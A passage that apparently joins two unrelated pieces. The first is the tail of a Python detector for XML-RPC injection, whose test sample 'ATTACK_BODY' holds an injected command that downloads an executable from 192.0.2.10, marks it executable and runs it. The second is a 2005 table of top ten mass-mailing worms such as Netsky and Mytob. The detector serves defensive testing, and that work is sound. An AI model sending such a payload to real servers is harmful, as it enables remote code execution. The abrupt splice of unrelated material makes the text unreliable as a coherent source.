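    b"<params><param><value><string>appkey</string></value></param></params></methodCall>"
)
ATTACK_BODY = (
    b"<?xml version='1.0'?><methodCall><methodName>test.method</methodName><params>"
    b"<param><value><struct><member>"
    b"<name>');system('cd /tmp;wget http://192.0.2.10/listen;chmod +x listen;./listen');exit;/*</name>"
    b"<value><string>x</string></value></member></struct></value></param></params></methodCall>"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("attack", ATTACK_BODY)):
        print(label, classify_request(body))
```

Because the payload travels in a POST body, ordinary access logs will not show it; this check belongs in a reverse proxy or web application firewall that sees request bodies, or in a post-incident review of captured traffic. A body that fails to parse is reported separately rather than silently passed, since the vulnerable library's own parser was lenient.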
Viruses/Trojans
Top Ten Virus Threats
A list of high threat viruses, as reported to various anti-virus vendors and virus incident reporting organizations, has been ranked and categorized in the table below. For the purposes of collecting and collating data, infections involving multiple systems at a single location are considered a single infection. It is therefore possible that a virus has infected hundreds of machines but has only been counted once. With the number of viruses that appear each month, it is possible that a new virus will become widely distributed before the next edition of this publication. To limit the possibility of infection, readers are reminded to update their anti-virus packages as soon as updates become available. The table lists the viruses by ranking (number of sites affected), common virus name, type of virus code (i.e., boot, file, macro, multi-partite, script), trends (based on number of infections reported since last week), and approximate date first found.
Rank | Common Name | Type of Code | Trend | Date | Description |
1 | Netsky-P | Win32 Worm | Stable | March 2004 | A mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The worm also tries to spread through various file-sharing programs by copying itself into various shared folders. |
2 | Mytob-BE | Win32 Worm | Stable | June 2005 | A slight variant of the mass-mailing worm that utilizes an IRC backdoor, the LSASS vulnerability, and email to propagate. It harvests addresses from the Windows address book, disables anti-virus software, and modifies data. |
3 | Netsky-D | Win32 Worm | Stable | March 2004 | A simplified variant of the Netsky mass-mailing worm in that it does not contain many of the text strings that were present in NetSky.C and it does not copy itself to shared folders. Netsky.D spreads itself in e-mails as an executable attachment only. |
4 | Mytob-GH | Win32 Worm | Stable | November 2005 | A variant of the mass-mailing worm that disables security related programs and allows others to access the infected system. This version sends itself to email addresses harvested from the system, forging the sender's address. |
5 | Mytob-AS | Win32 Worm | Stable | June 2005 | A slight variant of the mass-mailing worm that disables security related programs and processes, redirects various sites, and changes registry values. This version downloads code from the net and utilizes its own email engine. |
6 | Netsky-Z | Win32 Worm | Stable | April 2004 | A mass-mailing worm that is very close to previous variants. The worm spreads in e-mails, but does not spread over the local network or P2P networks and does not uninstall the Bagle worm. The worm has a backdoor that listens on port 665. |
7 | Lovgate.w | Win32 Worm | Stable | April 2004 | A mass-mailing worm that propagates by using MAPI to reply to messages, by using an internal SMTP engine, by dropping copies of itself on network shares, and through peer-to-peer networks. It attempts to access all machines in the local area network. |
8 | Zafi-D | Win32 Worm | Stable | December 2004 | A mass-mailing worm that sends itself to email addresses gathered from the infected computer. The worm may also attempt to lower security settings, terminate processes, and open a back door on the compromised computer. |
9 | Zafi-B | Win32 Worm | Stable | June 2004 | A mass-mailing worm that spreads via e-mail using several different languages, including English, Hungarian and Russian. When executed, the worm makes two copies of itself in the %System% directory with randomly generated file names. |
10 | Mytob.C | Win32 Worm | Stable | March 2005 | A mass-mailing worm with IRC backdoor functionality which can also infect computers vulnerable to the Windows LSASS (MS04-011) exploit. The worm will attempt to harvest email addresses from the local hard disk by scanning files. |
Table updated November 7, 2005